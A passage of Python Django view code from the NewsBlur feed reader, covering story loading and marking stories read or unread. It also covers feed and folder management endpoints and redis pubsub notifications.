    story_date_order = "%sstory_date" % ('' if order == 'oldest' else '-')
    
    if story_hashes:
        # Explicit hashes: no unread bookkeeping is needed or possible.
        unread_feed_story_hashes = None
        read_filter = 'unread'
        mstories = MStory.objects(story_hash__in=story_hashes).order_by(story_date_order)
        stories = Feed.format_stories(mstories)
    elif query:
        if user.profile.is_premium:
            user_search = MUserSearch.get_user(user.pk)
            user_search.touch_search_date()
            usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=feed_ids,
                                                       read_filter='all')
            feed_ids = [sub.feed_id for sub in usersubs]
            stories = Feed.find_feed_stories(feed_ids, query, order=order, offset=offset, limit=limit)
            mstories = stories
            # Needed later to mark which search results are already read.
            unread_feed_story_hashes = UserSubscription.story_hashes(user.pk, feed_ids=feed_ids, 
                                                                     read_filter="unread", order=order, 
                                                                     group_by_feed=False, 
                                                                     cutoff_date=user.profile.unread_cutoff)
        else:
            stories = []
            mstories = []
            message = "You must be a premium subscriber to search."
    elif read_filter == 'starred':
        mstories = MStarredStory.objects(
            user_id=user.pk,
            story_feed_id__in=feed_ids
        ).order_by('%sstarred_date' % ('-' if order == 'newest' else ''))[offset:offset+limit]
        stories = Feed.format_stories(mstories) 
    else:
        # Normal river: resolve subscriptions, then pull hashes from redis.
        usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=feed_ids,
                                                   read_filter=read_filter)
        all_feed_ids = [f for f in feed_ids]
        feed_ids = [sub.feed_id for sub in usersubs]
        if feed_ids:
            params = {
                "user_id": user.pk, 
                "feed_ids": feed_ids,
                "all_feed_ids": all_feed_ids,
                "offset": offset,
                "limit": limit,
                "order": order,
                "read_filter": read_filter,
                "usersubs": usersubs,
                "cutoff_date": user.profile.unread_cutoff,
            }
            story_hashes, unread_feed_story_hashes = UserSubscription.feed_stories(**params)
        else:
            story_hashes = []
            unread_feed_story_hashes = []

        mstories = MStory.objects(story_hash__in=story_hashes).order_by(story_date_order)
        stories = Feed.format_stories(mstories)
    
    found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
    stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk)
    
    # Some branches above never loaded subscriptions; load them now for training state.
    if not usersubs:
        usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=found_feed_ids,
                                                   read_filter=read_filter)

    trained_feed_ids = [sub.feed_id for sub in usersubs if sub.is_trained]
    found_trained_feed_ids = list(set(trained_feed_ids) & set(found_feed_ids))

    # Find starred stories
    if found_feed_ids:
        if read_filter == 'starred':
            # The page *is* starred stories; reuse them instead of re-querying.
            starred_stories = mstories
        else:
            starred_stories = MStarredStory.objects(
                user_id=user.pk,
                story_feed_id__in=found_feed_ids
            ).only('story_hash', 'starred_date')
        starred_stories = dict([(story.story_hash, dict(starred_date=story.starred_date,
                                                        user_tags=story.user_tags)) 
                                for story in starred_stories])
    else:
        starred_stories = {}
    
    # Intelligence classifiers for all feeds involved
    if found_trained_feed_ids:
        classifier_feeds = list(MClassifierFeed.objects(user_id=user.pk,
                                                        feed_id__in=found_trained_feed_ids,
                                                        social_user_id=0))
        classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk, 
                                                            feed_id__in=found_trained_feed_ids))
        classifier_titles = list(MClassifierTitle.objects(user_id=user.pk, 
                                                          feed_id__in=found_trained_feed_ids))
        classifier_tags = list(MClassifierTag.objects(user_id=user.pk, 
                                                      feed_id__in=found_trained_feed_ids))
    else:
        classifier_feeds = []
        classifier_authors = []
        classifier_titles = []
        classifier_tags = []
    classifiers = sort_classifiers_by_feed(user=user, feed_ids=found_feed_ids,
                                           classifier_feeds=classifier_feeds,
                                           classifier_authors=classifier_authors,
                                           classifier_titles=classifier_titles,
                                           classifier_tags=classifier_tags)
    
    # Just need to format stories
    nowtz = localtime_for_timezone(now, user.profile.timezone)
    for story in stories:
        if read_filter == 'starred':
            story['read_status'] = 1
        else:
            story['read_status'] = 0
        if read_filter == 'all' or query:
            # Anything not in the unread hash set counts as already read.
            if (unread_feed_story_hashes is not None and 
                story['story_hash'] not in unread_feed_story_hashes):
                story['read_status'] = 1
        story_date = localtime_for_timezone(story['story_date'], user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date']  = format_story_link_date__long(story_date, nowtz)
        if story['story_hash'] in starred_stories:
            story['starred'] = True
            starred_date = localtime_for_timezone(starred_stories[story['story_hash']]['starred_date'],
                                                  user.profile.timezone)
            story['starred_date'] = format_story_link_date__long(starred_date, now)
            story['starred_timestamp'] = starred_date.strftime('%s')
            story['user_tags'] = starred_stories[story['story_hash']]['user_tags']
        story['intelligence'] = {
            'feed':   apply_classifier_feeds(classifier_feeds, story['story_feed_id']),
            'author': apply_classifier_authors(classifier_authors, story),
            'tags':   apply_classifier_tags(classifier_tags, story),
            'title':  apply_classifier_titles(classifier_titles, story),
        }
        story['score'] = UserSubscription.score_story(story['intelligence'])
        
    
    if not user.profile.is_premium:
        message = "The full River of News is a premium feature."
        code = 0
        # if page > 1:
        #     stories = []
        # else:
        #     stories = stories[:5]
    diff = time.time() - start
    timediff = round(float(diff), 2)
    logging.user(request, "~FYLoading ~FCriver stories~FY: ~SBp%s~SN (%s/%s "
                               "stories, ~SN%s/%s/%s feeds, %s/%s)" % 
                               (page, len(stories), len(mstories), len(found_feed_ids), 
                               len(feed_ids), len(original_feed_ids), order, read_filter))


    # Strip negatively-scored stories unless the client asked for them.
    if not include_hidden:
        hidden_stories_removed = 0
        new_stories = []
        for story in stories:
            if story['score'] >= 0:
                new_stories.append(story)
            else:
                hidden_stories_removed += 1
        stories = new_stories
    
    # if page <= 1:
    #     import random
    #     time.sleep(random.randint(0, 6))
    
    data = dict(code=code,
                message=message,
                stories=stories,
                classifiers=classifiers, 
                elapsed_time=timediff, 
                user_search=user_search, 
                user_profiles=user_profiles)
                
    if not include_hidden: data['hidden_stories_removed'] = hidden_stories_removed
    
    return data
    

@json.json_view
def unread_story_hashes__old(request):
    """Legacy unread-hash endpoint: up to 500 unread hashes per subscribed feed.

    Returns {feed_id: [story_hash, ...]} — or hash/timestamp score pairs
    when ``include_timestamps`` is truthy. Feeds with no unread counts
    (or no matching subscription) are skipped entirely.
    """
    user               = get_user(request)
    feed_ids           = [int(feed_id) for feed_id in request.REQUEST.getlist('feed_id') if feed_id]
    include_timestamps = is_true(request.REQUEST.get('include_timestamps', False))
    
    if not feed_ids:
        # No explicit feeds: use every active subscription with unreads.
        usersubs = UserSubscription.objects.filter(Q(unread_count_neutral__gt=0) |
                                                   Q(unread_count_positive__gt=0),
                                                   user=user, active=True)
        feed_ids = [sub.feed_id for sub in usersubs]
    else:
        usersubs = UserSubscription.objects.filter(Q(unread_count_neutral__gt=0) |
                                                   Q(unread_count_positive__gt=0),
                                                   user=user, active=True, feed__in=feed_ids)
    
    unread_feed_story_hashes = {}
    story_hash_count = 0
    
    usersubs = dict((sub.feed_id, sub) for sub in usersubs)
    for feed_id in feed_ids:
        if feed_id not in usersubs:
            continue
        us = usersubs[feed_id]
        if not us.unread_count_neutral and not us.unread_count_positive:
            continue
        unread_feed_story_hashes[feed_id] = us.get_stories(read_filter='unread', limit=500,
                                                           withscores=include_timestamps,
                                                           hashes_only=True,
                                                           default_cutoff_date=user.profile.unread_cutoff)
        story_hash_count += len(unread_feed_story_hashes[feed_id])

    # Bug fix: story_hash_count is an int, so len(story_hash_count) raised a
    # TypeError every time this view reached the log line.
    logging.user(request, "~FYLoading ~FCunread story hashes~FY: ~SB%s feeds~SN (%s story hashes)" % 
                           (len(feed_ids), story_hash_count))

    return dict(unread_feed_story_hashes=unread_feed_story_hashes)

@json.json_view
def unread_story_hashes(request):
    """Return story hashes matching ``read_filter`` for the given feeds.

    Delegates the heavy lifting to UserSubscription.story_hashes; an empty
    ``feed_id`` list means all of the user's feeds.
    """
    user               = get_user(request)
    feed_ids           = [int(f) for f in request.REQUEST.getlist('feed_id') if f]
    include_timestamps = is_true(request.REQUEST.get('include_timestamps', False))
    order              = request.REQUEST.get('order', 'newest')
    read_filter        = request.REQUEST.get('read_filter', 'unread')
    
    story_hashes = UserSubscription.story_hashes(
        user.pk,
        feed_ids=feed_ids,
        order=order,
        read_filter=read_filter,
        include_timestamps=include_timestamps,
        cutoff_date=user.profile.unread_cutoff)
    logging.user(request, "~FYLoading ~FCunread story hashes~FY: ~SB%s feeds~SN (%s story hashes)" % 
                           (len(feed_ids), len(story_hashes)))
    return dict(unread_feed_story_hashes=story_hashes)

@ajax_login_required
@json.json_view
def mark_all_as_read(request):
    """Mark every feed and social subscription read.

    ``days`` keeps the most recent N days unread: subscriptions whose
    mark_read_date is older than the cutoff are advanced to it and flagged
    for an unread recount. days == 0 marks everything read outright.
    """
    code = 1
    try:
        days = int(request.REQUEST.get('days', 0))
    except ValueError:
        return dict(code=-1, message="Days parameter must be an integer, not: %s" %
                    request.REQUEST.get('days'))
    read_date = datetime.datetime.utcnow() - datetime.timedelta(days=days)
    
    usersubs   = UserSubscription.objects.filter(user=request.user)
    socialsubs = MSocialSubscription.objects.filter(user_id=request.user.pk)
    for subscriptions in (usersubs, socialsubs):
        for sub in subscriptions:
            if days == 0:
                sub.mark_feed_read()
            elif sub.mark_read_date < read_date:
                sub.needs_unread_recalc = True
                sub.mark_read_date = read_date
                sub.save()
    
    logging.user(request, "~FMMarking all as read: ~SB%s days" % (days,))
    return dict(code=code)
    
@ajax_login_required
@json.json_view
def mark_story_as_read(request):
    """Mark one or more story ids within a single feed as read."""
    story_ids = request.REQUEST.getlist('story_id')
    try:
        feed_id = int(get_argument_or_404(request, 'feed_id'))
    except ValueError:
        return dict(code=-1, errors=["You must pass a valid feed_id: %s" %
                                     request.REQUEST.get('feed_id')])
    
    usersub = None
    try:
        usersub = UserSubscription.objects.select_related('feed').get(user=request.user, feed=feed_id)
    except UserSubscription.DoesNotExist:
        pass
    except Feed.DoesNotExist:
        # The feed may have been merged away; chase the duplicate record.
        duplicate_feed = DuplicateFeed.objects.filter(duplicate_feed_id=feed_id)
        if not duplicate_feed:
            return dict(code=-1, errors=["No feed exists for feed_id %d." % feed_id])
        feed_id = duplicate_feed[0].feed_id
        try:
            usersub = UserSubscription.objects.get(user=request.user,
                                                   feed=duplicate_feed[0].feed)
        except Feed.DoesNotExist:
            return dict(code=-1, errors=["No feed exists for feed_id %d." % feed_id])
        
    if usersub:
        data = usersub.mark_story_ids_as_read(story_ids, request=request)
    else:
        data = dict(code=-1, errors=["User is not subscribed to this feed."])

    # Notify connected clients that this feed's counts changed.
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'feed:%s' % feed_id)

    return data

@ajax_login_required
@json.json_view
def mark_story_hashes_as_read(request):
    """Mark a batch of story hashes read, updating feed and social subs."""
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    story_hashes = request.REQUEST.getlist('story_hash')
    
    feed_ids, friend_ids = RUserStory.mark_story_hashes_read(request.user.pk, story_hashes)
    
    if friend_ids:
        # Flag every affected social subscription for an unread recount.
        socialsubs = MSocialSubscription.objects.filter(
                        user_id=request.user.pk,
                        subscription_user_id__in=friend_ids)
        for socialsub in socialsubs:
            if not socialsub.needs_unread_recalc:
                socialsub.needs_unread_recalc = True
                socialsub.save()
            r.publish(request.user.username, 'social:%s' % socialsub.subscription_user_id)

    # Also count on original subscription
    for feed_id in feed_ids:
        usersubs = UserSubscription.objects.filter(user=request.user.pk, feed=feed_id)
        if not usersubs:
            continue
        usersub = usersubs[0]
        if not usersub.needs_unread_recalc:
            usersub.needs_unread_recalc = True
            usersub.save(update_fields=['needs_unread_recalc'])
        r.publish(request.user.username, 'feed:%s' % feed_id)
    
    hash_count = len(story_hashes)
    noun = 'story' if hash_count == 1 else 'stories'
    logging.user(request, "~FYRead %s %s in feed/socialsubs: %s/%s" % (
                 hash_count, noun, feed_ids, friend_ids))

    return dict(code=1, story_hashes=story_hashes, 
                feed_ids=feed_ids, friend_user_ids=friend_ids)

@ajax_login_required
@json.json_view
def mark_feed_stories_as_read(request):
    """Mark batches of story ids read across several feeds at once.

    ``feeds_stories`` is JSON shaped as {feed_id: [story_id, ...]}.
    Note: the returned ``data`` is whatever the *last* processed feed's
    mark_story_ids_as_read returned; a missing subscription or feed aborts
    the whole batch with code -1.
    """
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    feeds_stories = request.REQUEST.get('feeds_stories', "{}")
    feeds_stories = json.decode(feeds_stories)
    data = {
        'code': -1,
        'message': 'Nothing was marked as read'
    }
    
    for feed_id, story_ids in feeds_stories.items():
        try:
            feed_id = int(feed_id)
        except ValueError:
            continue  # skip malformed feed ids
        try:
            usersub = UserSubscription.objects.select_related('feed').get(user=request.user, feed=feed_id)
            data = usersub.mark_story_ids_as_read(story_ids, request=request)
        except UserSubscription.DoesNotExist:
            return dict(code=-1, error="You are not subscribed to this feed_id: %d" % feed_id)
        except Feed.DoesNotExist:
            # Feed may have been merged into another; follow the duplicate.
            duplicate_feed = DuplicateFeed.objects.filter(duplicate_feed_id=feed_id)
            try:
                # Re-raise into the same handler when no duplicate exists.
                if not duplicate_feed: raise Feed.DoesNotExist
                usersub = UserSubscription.objects.get(user=request.user, 
                                                       feed=duplicate_feed[0].feed)
                data = usersub.mark_story_ids_as_read(story_ids, request=request)
            except (UserSubscription.DoesNotExist, Feed.DoesNotExist):
                return dict(code=-1, error="No feed exists for feed_id: %d" % feed_id)

        r.publish(request.user.username, 'feed:%s' % feed_id)
    
    return data
    
@ajax_login_required
@json.json_view
def mark_social_stories_as_read(request):
    """Mark stories read across social (blurblog) subscriptions.

    ``users_feeds_stories`` is JSON shaped as
    {social_user_id: {feed_id: [story_id, ...]}}. Errors are accumulated
    into ``errors`` rather than aborting, so one bad feed doesn't block
    the rest of the batch.
    """
    code = 1
    errors = []
    data = {}
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    users_feeds_stories = request.REQUEST.get('users_feeds_stories', "{}")
    users_feeds_stories = json.decode(users_feeds_stories)

    for social_user_id, feeds in users_feeds_stories.items():
        for feed_id, story_ids in feeds.items():
            feed_id = int(feed_id)
            try:
                socialsub = MSocialSubscription.objects.get(user_id=request.user.pk, 
                                                            subscription_user_id=social_user_id)
                data = socialsub.mark_story_ids_as_read(story_ids, feed_id, request=request)
            except OperationError, e:
                code = -1
                errors.append("Already read story: %s" % e)
            except MSocialSubscription.DoesNotExist:
                # Not subscribed to this blurblog; record the read anyway.
                MSocialSubscription.mark_unsub_story_ids_as_read(request.user.pk, social_user_id,
                                                                 story_ids, feed_id,
                                                                 request=request)
            except Feed.DoesNotExist:
                # Feed may have been merged away; retry against the duplicate's feed.
                duplicate_feed = DuplicateFeed.objects.filter(duplicate_feed_id=feed_id)
                if duplicate_feed:
                    try:
                        socialsub = MSocialSubscription.objects.get(user_id=request.user.pk,
                                                                    subscription_user_id=social_user_id)
                        data = socialsub.mark_story_ids_as_read(story_ids, duplicate_feed[0].feed.pk, request=request)
                    except (UserSubscription.DoesNotExist, Feed.DoesNotExist):
                        code = -1
                        errors.append("No feed exists for feed_id %d." % feed_id)
                else:
                    continue
            r.publish(request.user.username, 'feed:%s' % feed_id)
        r.publish(request.user.username, 'social:%s' % social_user_id)

    data.update(code=code, errors=errors)
    return data
    
@required_params('story_id', feed_id=int)
@ajax_login_required
@json.json_view
def mark_story_as_unread(request):
    """Mark a single story as unread within one feed.

    Flags the subscription for an unread recount, inverts read state for
    stories read after this one, and removes the hash from redis read
    state. Returns code -1 when the story can't be found or when
    RUserStory.story_can_be_marked_read_by_user returns an error message.
    """
    story_id = request.REQUEST.get('story_id', None)
    feed_id = int(request.REQUEST.get('feed_id', 0))
    
    try:
        usersub = UserSubscription.objects.select_related('feed').get(user=request.user, feed=feed_id)
        feed = usersub.feed
    except UserSubscription.DoesNotExist:
        # Not subscribed: proceed without subscription bookkeeping.
        usersub = None
        feed = Feed.get_by_id(feed_id)
        
    if usersub and not usersub.needs_unread_recalc:
        usersub.needs_unread_recalc = True
        usersub.save(update_fields=['needs_unread_recalc'])
        
    data = dict(code=0, payload=dict(story_id=story_id))
    
    story, found_original = MStory.find_story(feed_id, story_id)
    
    if not story:
        logging.user(request, "~FY~SBUnread~SN story in feed: %s (NOT FOUND)" % (feed))
        return dict(code=-1, message="Story not found.")
    
    if usersub:
        data = usersub.invert_read_stories_after_unread_story(story, request)

    # A non-empty message means the story is ineligible (e.g. presumably too
    # old); return it to the client instead of proceeding.
    message = RUserStory.story_can_be_marked_read_by_user(story, request.user)
    if message:
        data['code'] = -1
        data['message'] = message
        return data
    
    # Dirty any social subscriptions sharing this story so their counts refresh.
    social_subs = MSocialSubscription.mark_dirty_sharing_story(user_id=request.user.pk, 
                                                               story_feed_id=feed_id, 
                                                               story_guid_hash=story.guid_hash)
    dirty_count = social_subs and social_subs.count()
    dirty_count = ("(%s social_subs)" % dirty_count) if dirty_count else ""
    RUserStory.mark_story_hash_unread(user_id=request.user.pk, story_hash=story.story_hash)
    
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'feed:%s' % feed_id)

    logging.user(request, "~FY~SBUnread~SN story in feed: %s %s" % (feed, dirty_count))
    
    return data

@ajax_login_required
@json.json_view
@required_params('story_hash')
def mark_story_hash_as_unread(request):
    """Mark a story unread by story_hash, updating feed and social subs."""
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    story_hash = request.REQUEST.get('story_hash')
    feed_id, _ = MStory.split_story_hash(story_hash)
    story, _ = MStory.find_story(feed_id, story_hash)
    if not story:
        data = dict(code=-1, message="That story has been removed from the feed, no need to mark it unread.")
        return data        
    # A non-empty message means the story is ineligible to be toggled;
    # surface the reason to the client.
    message = RUserStory.story_can_be_marked_read_by_user(story, request.user)
    if message:
        data = dict(code=-1, message=message)
        return data
    
    # Also count on original subscription
    usersubs = UserSubscription.objects.filter(user=request.user.pk, feed=feed_id)
    if usersubs:
        usersub = usersubs[0]
        if not usersub.needs_unread_recalc:
            usersub.needs_unread_recalc = True
            usersub.save(update_fields=['needs_unread_recalc'])
        data = usersub.invert_read_stories_after_unread_story(story, request)
        r.publish(request.user.username, 'feed:%s' % feed_id)

    # NOTE: feed_id is rebound here to whatever redis reports for the hash.
    feed_id, friend_ids = RUserStory.mark_story_hash_unread(request.user.pk, story_hash)

    if friend_ids:
        # Flag affected social subscriptions for an unread recount.
        socialsubs = MSocialSubscription.objects.filter(
                        user_id=request.user.pk,
                        subscription_user_id__in=friend_ids)
        for socialsub in socialsubs:
            if not socialsub.needs_unread_recalc:
                socialsub.needs_unread_recalc = True
                socialsub.save()
            r.publish(request.user.username, 'social:%s' % socialsub.subscription_user_id)

    logging.user(request, "~FYUnread story in feed/socialsubs: %s/%s" % (feed_id, friend_ids))

    return dict(code=1, story_hash=story_hash, feed_id=feed_id, friend_user_ids=friend_ids)

@ajax_login_required
@json.json_view
def mark_feed_as_read(request):
    # Mark one or more feeds as read. Entries prefixed "social:" address a
    # followed user's blurblog instead of a regular feed. An optional
    # cutoff_timestamp limits the marking to stories older (direction
    # 'older', default) or newer than that moment. Per-feed failures are
    # collected into `errors` rather than aborting the loop.
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    feed_ids = request.REQUEST.getlist('feed_id')
    cutoff_timestamp = int(request.REQUEST.get('cutoff_timestamp', 0))
    direction = request.REQUEST.get('direction', 'older')
    multiple = len(feed_ids) > 1
    code = 1
    errors = []
    cutoff_date = datetime.datetime.fromtimestamp(cutoff_timestamp) if cutoff_timestamp else None
    
    for feed_id in feed_ids:
        if 'social:' in feed_id:
            # Social feed: the id encodes the followed user's pk.
            user_id = int(feed_id.replace('social:', ''))
            try:
                sub = MSocialSubscription.objects.get(user_id=request.user.pk, 
                                                      subscription_user_id=user_id)
            except MSocialSubscription.DoesNotExist:
                logging.user(request, "~FRCouldn't find socialsub: %s" % user_id)
                continue
            if not multiple:
                sub_user = User.objects.get(pk=sub.subscription_user_id)
                logging.user(request, "~FMMarking social feed as read: ~SB%s" % (sub_user.username,))
        else:
            try:
                feed = Feed.objects.get(id=feed_id)
                sub = UserSubscription.objects.get(feed=feed, user=request.user)
                if not multiple:
                    logging.user(request, "~FMMarking feed as read: ~SB%s" % (feed,))
            except (Feed.DoesNotExist, UserSubscription.DoesNotExist), e:
                errors.append("User not subscribed: %s" % e)
                continue
            except (ValueError), e:
                # Non-numeric feed_id.
                errors.append("Invalid feed_id: %s" % e)
                continue

        if not sub:
            errors.append("User not subscribed: %s" % feed_id)
            continue
        
        try:
            if direction == "older":
                marked_read = sub.mark_feed_read(cutoff_date=cutoff_date)
            else:
                marked_read = sub.mark_newer_stories_read(cutoff_date=cutoff_date)
            if marked_read and not multiple:
                # Single feed: push a targeted refresh to connected clients.
                r.publish(request.user.username, 'feed:%s' % feed_id)
        except IntegrityError, e:
            errors.append("Could not mark feed as read: %s" % e)
            code = -1
            
    if multiple:
        logging.user(request, "~FMMarking ~SB%s~SN feeds as read" % len(feed_ids))
        # One combined refresh message covering every feed marked at once.
        r.publish(request.user.username, 'refresh:%s' % ','.join(feed_ids))
    
    if errors:
        logging.user(request, "~FMMarking read had errors: ~FR%s" % errors)
    
    return dict(code=code, errors=errors, cutoff_date=cutoff_date, direction=direction)

def _parse_user_info(user):
    """Build the 'user_info' payload describing the request's user."""
    authenticated = user.is_authenticated()
    info = {
        'is_anonymous': json.encode(user.is_anonymous()),
        'is_authenticated': json.encode(authenticated),
        'username': json.encode(user.username if authenticated else 'Anonymous'),
    }
    return {'user_info': info}

@ajax_login_required
@json.json_view
def add_url(request):
    # Subscribe the user to a new feed by URL, optionally filing it in a
    # (possibly newly created) folder, then tell clients to reload.
    code = 0
    url = request.POST['url']
    folder = request.POST.get('folder', '')
    new_folder = request.POST.get('new_folder')
    auto_active = is_true(request.POST.get('auto_active', 1))
    skip_fetch = is_true(request.POST.get('skip_fetch', False))
    feed = None
    
    if not url:
        code = -1
        message = 'Enter in the website address or the feed URL.'
    elif any([(banned_url in url) for banned_url in BANNED_URLS]):
        # Publishers who asked not to be crawled by NewsBlur.
        code = -1
        message = "The publisher of this website has banned NewsBlur."
    else:
        if new_folder:
            # Create the destination folder first, then subscribe into it.
            usf, _ = UserSubscriptionFolders.objects.get_or_create(user=request.user)
            usf.add_folder(folder, new_folder)
            folder = new_folder

        code, message, us = UserSubscription.add_subscription(user=request.user, feed_address=url, 
                                                             folder=folder, auto_active=auto_active,
                                                             skip_fetch=skip_fetch)
        feed = us and us.feed
        if feed:
            r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
            r.publish(request.user.username, 'reload:%s' % feed.pk)
            # Queue the new feed's stories for search indexing.
            MUserSearch.schedule_index_feeds_for_search(feed.pk, request.user.pk)
        
    return dict(code=code, message=message, feed=feed)

@ajax_login_required
@json.json_view
def add_folder(request):
    """Create a new folder inside parent_folder and return the updated tree."""
    folder = request.POST['folder']
    parent_folder = request.POST.get('parent_folder', '')
    logging.user(request, "~FRAdding Folder: ~SB%s (in %s)" % (folder, parent_folder))

    if not folder:
        return dict(code=-1, message="Gotta write in a folder name.", folders=None)

    usf, _ = UserSubscriptionFolders.objects.get_or_create(user=request.user)
    usf.add_folder(parent_folder, folder)
    updated_folders = json.decode(usf.folders)
    # Tell connected clients to reload the feed/folder tree.
    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    return dict(code=1, message="", folders=updated_folders)

@ajax_login_required
@json.json_view
def delete_feed(request):
    """Remove a feed subscription from the given folder for the current user."""
    feed_id = int(request.POST['feed_id'])
    in_folder = request.POST.get('in_folder', None)
    if in_folder == ' ' or not in_folder:
        in_folder = ""

    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.delete_feed(feed_id, in_folder)

    feed = Feed.objects.filter(pk=feed_id)
    if feed:
        # Refresh subscriber counts now that one subscription is gone.
        feed[0].count_subscribers()

    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    # NOTE(review): `feed` is a QuerySet here, so the message embeds its repr.
    return dict(code=1, message="Removed %s from '%s'." % (feed, in_folder))

@ajax_login_required
@json.json_view
def delete_feed_by_url(request):
    """Unsubscribe the user from the feed matching the given URL, if any."""
    url = request.POST['url']
    in_folder = request.POST.get('in_folder', '')
    if in_folder == ' ':
        in_folder = ""

    feed = Feed.get_feed_from_url(url, create=False)
    if not feed:
        return dict(code=-1, message="URL not found.")

    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.delete_feed(feed.pk, in_folder)
    remaining = Feed.objects.filter(pk=feed.pk)
    if remaining:
        # Refresh subscriber counts now that one subscription is gone.
        remaining[0].count_subscribers()

    return dict(code=1, message="")
    
@ajax_login_required
@json.json_view
def delete_folder(request):
    """Delete a folder (and the listed feeds inside it) from the user's tree."""
    folder_to_delete = request.POST.get('folder_name') or request.POST.get('folder_to_delete')
    in_folder = request.POST.get('in_folder', None)
    feed_ids_in_folder = [int(f) for f in request.REQUEST.getlist('feed_id') if f]

    # Email an OPML backup first, since this is destructive.
    request.user.profile.send_opml_export_email(reason="You have deleted an entire folder of feeds, so here's a backup just in case.")

    # Works piss poor with duplicate folder titles, if they are both in the same folder.
    # Deletes all, but only in the same folder parent. But nobody should be doing that, right?
    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.delete_folder(folder_to_delete, in_folder, feed_ids_in_folder)
    updated_folders = json.decode(user_sub_folders.folders)

    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    return dict(code=1, folders=updated_folders)


@required_params('feeds_by_folder')
@ajax_login_required
@json.json_view
def delete_feeds_by_folder(request):
    """Bulk-delete feeds, each addressed by its containing folder."""
    feeds_by_folder = json.decode(request.POST['feeds_by_folder'])

    # Email an OPML backup first, since this is destructive.
    request.user.profile.send_opml_export_email(reason="You have deleted a number of feeds at once, so here's a backup just in case.")

    # Works piss poor with duplicate folder titles, if they are both in the same folder.
    # Deletes all, but only in the same folder parent. But nobody should be doing that, right?
    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.delete_feeds_by_folder(feeds_by_folder)
    updated_folders = json.decode(user_sub_folders.folders)

    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    return dict(code=1, folders=updated_folders)

@ajax_login_required
@json.json_view
def rename_feed(request):
    """Store a custom per-user title for one of the user's subscriptions."""
    feed = get_object_or_404(Feed, pk=int(request.POST['feed_id']))
    user_sub = UserSubscription.objects.get(user=request.user, feed=feed)
    new_title = request.POST['feed_title']

    logging.user(request, "~FRRenaming feed '~SB%s~SN' to: ~SB%s" % (
                 feed.feed_title, new_title))

    user_sub.user_title = new_title
    user_sub.save()

    return dict(code=1)
    
@ajax_login_required
@json.json_view
def rename_folder(request):
    """Rename a folder in the user's subscription tree."""
    folder_to_rename = request.POST.get('folder_name') or request.POST.get('folder_to_rename')
    new_folder_name = request.POST['new_folder_name']
    in_folder = request.POST.get('in_folder', '')

    # Works piss poor with duplicate folder titles, if they are both in the same folder.
    # renames all, but only in the same folder parent. But nobody should be doing that, right?
    if not (folder_to_rename and new_folder_name):
        return dict(code=-1)

    user_sub_folders = get_object_or_404(UserSubscriptionFolders, user=request.user)
    user_sub_folders.rename_folder(folder_to_rename, new_folder_name, in_folder)

    return dict(code=1)
    
@ajax_login_required
@json.json_view
def move_feed_to_folders(request):
    """Move a feed out of in_folders and into to_folders, then push a reload."""
    feed_id = int(request.POST['feed_id'])
    source_folders = request.POST.getlist('in_folders', '')
    target_folders = request.POST.getlist('to_folders', '')

    usf = get_object_or_404(UserSubscriptionFolders, user=request.user)
    usf = usf.move_feed_to_folders(feed_id, in_folders=source_folders,
                                   to_folders=target_folders)

    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(usf.folders))
    
@ajax_login_required
@json.json_view
def move_feed_to_folder(request):
    """Move a single feed from in_folder to to_folder, then push a reload."""
    feed_id = int(request.POST['feed_id'])
    source_folder = request.POST.get('in_folder', '')
    target_folder = request.POST.get('to_folder', '')

    usf = get_object_or_404(UserSubscriptionFolders, user=request.user)
    usf = usf.move_feed_to_folder(feed_id, in_folder=source_folder,
                                  to_folder=target_folder)

    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(usf.folders))
    
@ajax_login_required
@json.json_view
def move_folder_to_folder(request):
    """Re-parent a folder under a different folder, then push a reload."""
    folder_name = request.POST['folder_name']
    source_folder = request.POST.get('in_folder', '')
    target_folder = request.POST.get('to_folder', '')

    usf = get_object_or_404(UserSubscriptionFolders, user=request.user)
    usf = usf.move_folder_to_folder(folder_name, in_folder=source_folder, to_folder=target_folder)

    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(usf.folders))

@required_params('feeds_by_folder', 'to_folder')
@ajax_login_required
@json.json_view
def move_feeds_by_folder_to_folder(request):
    """Bulk-move feeds (grouped by folder) into to_folder, creating new_folder first if given."""
    feeds_by_folder = json.decode(request.POST['feeds_by_folder'])
    to_folder = request.POST['to_folder']
    new_folder = request.POST.get('new_folder', None)

    # Email an OPML backup first, since bulk moves are hard to undo by hand.
    request.user.profile.send_opml_export_email(reason="You have moved a number of feeds at once, so here's a backup just in case.")

